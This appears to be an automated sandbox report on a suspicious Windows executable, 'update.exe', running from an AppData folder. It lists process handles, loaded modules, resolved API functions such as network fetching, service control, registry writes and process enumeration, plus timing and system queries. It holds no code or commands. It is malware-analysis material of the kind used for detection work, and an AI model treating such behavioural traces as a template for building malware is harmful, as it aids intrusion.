Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\audiodg.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\userinit.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\explorer.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\dwm.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\dwm.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\spoolsv.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\taskhost.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\program files (x86)\adobe\reader 10.0\reader\reader_sl.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\users\5p5nrgjn0js halpmcxz\appdata\local\544c4f6e-08e8-406f-ae98-d88505d8a2e3\update.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\users\5p5nrgjn0js halpmcxz\appdata\local\544c4f6e-08e8-406f-ae98-d88505d8a2e3\update.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\users\5p5nrgjn0js halpmcxz\appdata\local\544c4f6e-08e8-406f-ae98-d88505d8a2e3\update.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\users\5p5nrgjn0js halpmcxz\appdata\local\544c4f6e-08e8-406f-ae98-d88505d8a2e3\update.exe	desired_access = SYNCHRONIZE	21	Fn

Module (292)

Operation	Module	Additional Information	Count	Logfile
Load	kernel32.dll	base_address = 0x773e0000	2	Fn
Load	RPCRT4.dll	base_address = 0x77150000	1	Fn
Load	MPR.dll	base_address = 0x75380000	1	Fn
Load	WININET.dll	base_address = 0x75bd0000	1	Fn
Load	WINMM.dll	base_address = 0x75340000	1	Fn
Load	SHLWAPI.dll	base_address = 0x76e40000	1	Fn
Load	KERNEL32.dll	base_address = 0x773e0000	1	Fn
Load	USER32.dll	base_address = 0x75e50000	1	Fn
Load	ADVAPI32.dll	base_address = 0x75720000	1	Fn
Load	SHELL32.dll	base_address = 0x75fa0000	1	Fn
Load	ole32.dll	base_address = 0x75810000	1	Fn
Load	OLEAUT32.dll	base_address = 0x77000000	1	Fn
Load	IPHLPAPI.DLL	base_address = 0x75320000	1	Fn
Load	WS2_32.dll	base_address = 0x757d0000	1	Fn
Load	DNSAPI.dll	base_address = 0x752c0000	1	Fn
Load	msvcr100.dll	base_address = 0x75200000	1	Fn
Load	Psapi.dll	base_address = 0x770c0000	1	Fn
Get Handle	c:\windows\syswow64\kernel32.dll	base_address = 0x773e0000	13	Fn
Get Handle	mscoree.dll	-	1	Fn
Get Filename	-	process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\local\544c4f6e-08e8-406f-ae98-d88505d8a2e3\update.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\544c4f6e-08e8-406f-ae98-d88505d8a2e3\update.exe, size = 260	2	Fn
Get Filename	-	process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\local\544c4f6e-08e8-406f-ae98-d88505d8a2e3\update.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\544c4f6e-08e8-406f-ae98-d88505d8a2e3\update.exe, size = 1024	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FlsAlloc, address_out = 0x773f4f2b	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FlsGetValue, address_out = 0x773f1252	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FlsSetValue, address_out = 0x773f4208	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FlsFree, address_out = 0x773f359f	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = EncodePointer, address_out = 0x77ad0fcb	9	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = DecodePointer, address_out = 0x77ac9d35	4	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateToolhelp32Snapshot, address_out = 0x7741735f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = Module32First, address_out = 0x77475cd9	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = VirtualAlloc, address_out = 0x773f1856	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = VirtualProtect, address_out = 0x773f435f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = VirtualFree, address_out = 0x773f186e	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetVersionExA, address_out = 0x773f3519	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = TerminateProcess, address_out = 0x7740d802	2	Fn
Get Address	c:\windows\syswow64\rpcrt4.dll	function = RpcStringFreeW, address_out = 0x77171635	1	Fn
Get Address	c:\windows\syswow64\rpcrt4.dll	function = UuidToStringW, address_out = 0x77191ee5	1	Fn
Get Address	c:\windows\syswow64\rpcrt4.dll	function = UuidToStringA, address_out = 0x771cd918	1	Fn
Get Address	c:\windows\syswow64\rpcrt4.dll	function = RpcStringFreeA, address_out = 0x77193fc5	1	Fn
Get Address	c:\windows\syswow64\rpcrt4.dll	function = UuidCreate, address_out = 0x7716f48b	1	Fn
Get Address	c:\windows\syswow64\mpr.dll	function = WNetCloseEnum, address_out = 0x75382dd6	1	Fn
Get Address	c:\windows\syswow64\mpr.dll	function = WNetOpenEnumW, address_out = 0x75382f06	1	Fn
Get Address	c:\windows\syswow64\mpr.dll	function = WNetEnumResourceW, address_out = 0x75383058	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetOpenA, address_out = 0x75bff18e	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetReadFile, address_out = 0x75beb406	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = HttpQueryInfoW, address_out = 0x75bf5c75	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetCloseHandle, address_out = 0x75beab49	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetOpenW, address_out = 0x75bf9197	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetOpenUrlW, address_out = 0x75c4be5c	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetOpenUrlA, address_out = 0x75c130f1	1	Fn
Get Address	c:\windows\syswow64\winmm.dll	function = timeGetTime, address_out = 0x753426e0	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathFindExtensionW, address_out = 0x76e5a1b9	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathFindFileNameW, address_out = 0x76e5bb71	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathFileExistsA, address_out = 0x76e7ad1a	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathAppendW, address_out = 0x76e581ef	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathRemoveFileSpecW, address_out = 0x76e53248	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathAppendA, address_out = 0x76e4d65e	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathFileExistsW, address_out = 0x76e545bf	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetTimeFormatW, address_out = 0x7740f481	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetDateFormatW, address_out = 0x774134d7	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = EnumSystemLocalesW, address_out = 0x7747425f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetUserDefaultLCID, address_out = 0x773f3da5	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = IsValidLocale, address_out = 0x7740ce46	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetLocaleInfoW, address_out = 0x773f3c42	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCommandLineW, address_out = 0x773f5223	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetFileSize, address_out = 0x773f196e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FindFirstFileW, address_out = 0x773f4435	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetFilePointer, address_out = 0x773f17d1	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrlenA, address_out = 0x773f5a4b	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetErrorMode, address_out = 0x773f1b00	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateProcessW, address_out = 0x773f103d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateDirectoryW, address_out = 0x773f4259	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WaitForSingleObject, address_out = 0x773f1136	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetLogicalDrives, address_out = 0x773f5371	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WriteFile, address_out = 0x773f1282	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetDriveTypeA, address_out = 0x7740ef75	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = OpenProcess, address_out = 0x773f1986	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GlobalAlloc, address_out = 0x773f588e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetSystemDirectoryW, address_out = 0x773f5063	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WideCharToMultiByte, address_out = 0x773f170d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LoadLibraryW, address_out = 0x773f492b	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = Sleep, address_out = 0x773f10ff	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CopyFileW, address_out = 0x7741830d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FormatMessageW, address_out = 0x773f4620	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrcpynW, address_out = 0x7741d556	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = ReadFile, address_out = 0x773f3ed3	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateFileW, address_out = 0x773f3f5c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrcatA, address_out = 0x77412b7a	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrcmpW, address_out = 0x773f5929	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = MultiByteToWideChar, address_out = 0x773f192e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrlenW, address_out = 0x773f1700	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetLastError, address_out = 0x773f11c0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetLastError, address_out = 0x773f11a9	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetProcAddress, address_out = 0x773f1222	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = MoveFileW, address_out = 0x77409af0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LocalAlloc, address_out = 0x773f168c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateEventW, address_out = 0x773f183e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrcatW, address_out = 0x7741828e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FindNextFileW, address_out = 0x773f54ee	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CloseHandle, address_out = 0x773f1410	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = DeleteFileW, address_out = 0x773f89b3	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LocalFree, address_out = 0x773f2d3c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CompareStringW, address_out = 0x773f3bca	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetPriorityClass, address_out = 0x7740cf28	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCurrentProcess, address_out = 0x773f1809	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetComputerNameW, address_out = 0x773fdd0e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetExitCodeProcess, address_out = 0x7740174d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetModuleFileNameW, address_out = 0x773f4950	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GlobalFree, address_out = 0x773f5558	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateMutexA, address_out = 0x773f4c6b	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetVersion, address_out = 0x773f4467	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCurrentProcessId, address_out = 0x773f11f8	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateThread, address_out = 0x773f34d5	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateFileA, address_out = 0x773f53c6	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateDirectoryA, address_out = 0x7741d526	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrcpyA, address_out = 0x77412a9d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FatalAppExitA, address_out = 0x77474691	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateSemaphoreW, address_out = 0x7740ca5a	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetModuleHandleW, address_out = 0x773f34b0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetTickCount, address_out = 0x773f110c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = TlsFree, address_out = 0x773f3587	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = TlsSetValue, address_out = 0x773f14fb	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = TlsGetValue, address_out = 0x773f11e0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = TlsAlloc, address_out = 0x773f49ad	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = InitializeCriticalSectionAndSpinCount, address_out = 0x773f1916	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetUnhandledExceptionFilter, address_out = 0x773f87c9	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = UnhandledExceptionFilter, address_out = 0x7741772f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FreeEnvironmentStringsW, address_out = 0x773f51cb	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetEnvironmentStringsW, address_out = 0x773f51e3	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetSystemTimeAsFileTime, address_out = 0x773f3509	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = QueryPerformanceCounter, address_out = 0x773f1725	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetStartupInfoW, address_out = 0x773f4d40	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = DeleteCriticalSection, address_out = 0x77ac45f5	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetFileType, address_out = 0x773f3531	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = RaiseException, address_out = 0x773f58a6	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LCMapStringW, address_out = 0x773f17b9	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetConsoleCP, address_out = 0x77497bff	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetConsoleMode, address_out = 0x773f1328	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetFilePointerEx, address_out = 0x7740c807	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetConsoleCtrlHandler, address_out = 0x773f8a09	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FreeLibrary, address_out = 0x773f34c8	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LoadLibraryExW, address_out = 0x773f495d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = OutputDebugStringW, address_out = 0x7741d1d4	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = HeapReAlloc, address_out = 0x77ad1f6e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = RtlUnwind, address_out = 0x7741d1c3	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetStdHandle, address_out = 0x7747454f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = HeapFree, address_out = 0x773f14c9	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = HeapAlloc, address_out = 0x77abe026	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WriteConsoleW, address_out = 0x77417aca	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FlushFileBuffers, address_out = 0x773f469b	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetStringTypeW, address_out = 0x773f1946	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LeaveCriticalSection, address_out = 0x77ab2270	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = EnterCriticalSection, address_out = 0x77ab22b0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = HeapSize, address_out = 0x77ac3002	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetStdHandle, address_out = 0x773f51b3	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = AreFileApisANSI, address_out = 0x774740d1	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetModuleHandleExW, address_out = 0x773f4a6f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = ExitProcess, address_out = 0x773f7a10	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetProcessHeap, address_out = 0x773f14e9	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCurrentThreadId, address_out = 0x773f1450	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCurrentThread, address_out = 0x773f17ec	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = IsValidCodePage, address_out = 0x773f4493	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetACP, address_out = 0x773f179c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetOEMCP, address_out = 0x7741d1a1	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCPInfo, address_out = 0x773f5189	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = IsDebuggerPresent, address_out = 0x773f4a5d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrcpyW, address_out = 0x77413102	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = IsProcessorFeaturePresent, address_out = 0x773f5235	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = PostQuitMessage, address_out = 0x75e69abb	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = LoadCursorW, address_out = 0x75e688f7	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = BeginPaint, address_out = 0x75e71361	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = TranslateMessage, address_out = 0x75e67809	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = RegisterClassExW, address_out = 0x75e6b17d	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = ShowWindow, address_out = 0x75e70dfb	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = IsWindow, address_out = 0x75e67136	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = CreateWindowExW, address_out = 0x75e68a29	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = UpdateWindow, address_out = 0x75e73559	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = DefWindowProcW, address_out = 0x77ac25dd	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = PeekMessageW, address_out = 0x75e705ba	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = PostThreadMessageW, address_out = 0x75e68bff	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = MessageBoxW, address_out = 0x75ebfd3f	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = DispatchMessageW, address_out = 0x75e6787b	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = DestroyWindow, address_out = 0x75e69a55	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = EndPaint, address_out = 0x75e71341	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = SendMessageW, address_out = 0x75e69679	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = GetMessageW, address_out = 0x75e678e2	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CloseServiceHandle, address_out = 0x7573369c	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptAcquireContextW, address_out = 0x7572df14	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = GetUserNameW, address_out = 0x7573157a	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptHashData, address_out = 0x7572df36	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegSetValueExW, address_out = 0x757314d6	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegCloseKey, address_out = 0x7573469d	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptDestroyHash, address_out = 0x7572df66	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = OpenSCManagerW, address_out = 0x7572ca64	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = OpenServiceW, address_out = 0x7572ca4c	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = ControlService, address_out = 0x75747144	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegOpenKeyExW, address_out = 0x7573468d	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptCreateHash, address_out = 0x7572df4e	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = QueryServiceStatus, address_out = 0x75732a86	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegQueryValueExW, address_out = 0x757346ad	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptReleaseContext, address_out = 0x7572e124	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptGetHashParam, address_out = 0x7572df7e	1	Fn
Get Address	c:\windows\syswow64\shell32.dll	function = SHGetPathFromIDListW, address_out = 0x760317bf	1	Fn
Get Address	c:\windows\syswow64\shell32.dll	function = SHGetSpecialFolderLocation, address_out = 0x7602e141	1	Fn
Get Address	c:\windows\syswow64\shell32.dll	function = CommandLineToArgvW, address_out = 0x75fb9ee8	1	Fn
Get Address	c:\windows\syswow64\shell32.dll	function = ShellExecuteA, address_out = 0x761e7078	1	Fn
Get Address	c:\windows\syswow64\shell32.dll	function = ShellExecuteExW, address_out = 0x75fc1e46	1	Fn
Get Address	c:\windows\syswow64\ole32.dll	function = CoInitialize, address_out = 0x7582b636	1	Fn
Get Address	c:\windows\syswow64\ole32.dll	function = CoInitializeSecurity, address_out = 0x75837259	1	Fn
Get Address	c:\windows\syswow64\ole32.dll	function = CoUninitialize, address_out = 0x758586d3	1	Fn
Get Address	c:\windows\syswow64\ole32.dll	function = CoCreateInstance, address_out = 0x75859d0b	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = 202, address_out = 0x7700fd6b	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = 2, address_out = 0x77004642	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = 9, address_out = 0x77003eae	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = 8, address_out = 0x77003ed5	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = 6, address_out = 0x77003e59	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = 200, address_out = 0x77003f21	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = 12, address_out = 0x77005dee	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = 201, address_out = 0x77004af8	1	Fn
Get Address	c:\windows\syswow64\iphlpapi.dll	function = GetAdaptersInfo, address_out = 0x75329263	1	Fn
Get Address	c:\windows\syswow64\ws2_32.dll	function = 12, address_out = 0x757db131	1	Fn
Get Address	c:\windows\syswow64\ws2_32.dll	function = 11, address_out = 0x757d311b	1	Fn
Get Address	c:\windows\syswow64\ws2_32.dll	function = 52, address_out = 0x757e7673	1	Fn
Get Address	c:\windows\syswow64\dnsapi.dll	function = DnsFree, address_out = 0x752c436b	1	Fn
Get Address	c:\windows\syswow64\dnsapi.dll	function = DnsQuery_W, address_out = 0x752d572c	1	Fn
Get Address	c:\windows\syswow64\msvcr100.dll	function = atexit, address_out = 0x7521c544	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = InitializeCriticalSectionEx, address_out = 0x773f4d28	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateEventExW, address_out = 0x7747410b	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateSemaphoreExW, address_out = 0x77474195	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetThreadStackGuarantee, address_out = 0x773fd31f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateThreadpoolTimer, address_out = 0x7740ee7e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetThreadpoolTimer, address_out = 0x77ad441c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WaitForThreadpoolTimerCallbacks, address_out = 0x77afc50e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CloseThreadpoolTimer, address_out = 0x77afc381	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateThreadpoolWait, address_out = 0x7740f088	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetThreadpoolWait, address_out = 0x77ae05d7	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CloseThreadpoolWait, address_out = 0x77afca24	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FlushProcessWriteBuffers, address_out = 0x77ab0b8c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FreeLibraryWhenCallbackReturns, address_out = 0x77b6fde8	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCurrentProcessorNumber, address_out = 0x77b01e1d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetLogicalProcessorInformation, address_out = 0x77474761	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateSymbolicLinkW, address_out = 0x7746cd11	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetDefaultDllDirectories, address_out = 0x0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = EnumSystemLocalesEx, address_out = 0x7747424f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CompareStringEx, address_out = 0x774746b1	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetDateFormatEx, address_out = 0x77486676	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetLocaleInfoEx, address_out = 0x77474751	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetTimeFormatEx, address_out = 0x774865f1	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetUserDefaultLocaleName, address_out = 0x774747c1	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = IsValidLocaleName, address_out = 0x774747e1	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LCMapStringEx, address_out = 0x774747f1	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCurrentPackageId, address_out = 0x0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetTickCount64, address_out = 0x7740eee0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetFileInformationByHandleExW, address_out = 0x0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetFileInformationByHandleW, address_out = 0x0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = EnumProcesses, address_out = 0x0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = EnumProcessModules, address_out = 0x0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetModuleBaseNameW, address_out = 0x0	1	Fn
Get Address	c:\windows\syswow64\psapi.dll	function = EnumProcesses, address_out = 0x770c1544	1	Fn
Get Address	c:\windows\syswow64\psapi.dll	function = EnumProcessModules, address_out = 0x770c1408	1	Fn
Get Address	c:\windows\syswow64\psapi.dll	function = GetModuleBaseNameW, address_out = 0x770c152c	1	Fn

System (24)

Operation	Additional Information	Count	Logfile
Sleep	duration = 1 milliseconds (0.001 seconds)	20	Fn
Get Time	type = System Time, time = 2018-11-19 13:57:31 (UTC)	1	Fn
Get Time	type = Ticks, time = 48859	1	Fn
Get Time	type = System Time, time = 2018-11-19 13:57:32 (UTC)	1	Fn
Get Info	type = Operating System	1	Fn

Environment (2)

Operation	Additional Information	Success	Count	Logfile
Get Environment String	-		2	Fn Data

Notifications (2/5)

Monitored Processes

